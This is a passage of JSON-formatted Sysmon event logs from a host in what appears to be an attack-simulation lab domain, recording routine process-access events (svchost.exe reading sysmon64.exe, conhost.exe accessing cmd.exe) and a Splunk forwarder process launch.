:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3129,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3130,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3131,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3132,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3133,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3134,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3135,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3136,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010291F0500}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010291F0500}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3137,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.338\r\nProcessGuid: {A837DB8D-0239-5F25-0000-0010E51F0500}\r\nProcessId: 2528\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args\r\nCurrentDirectory: 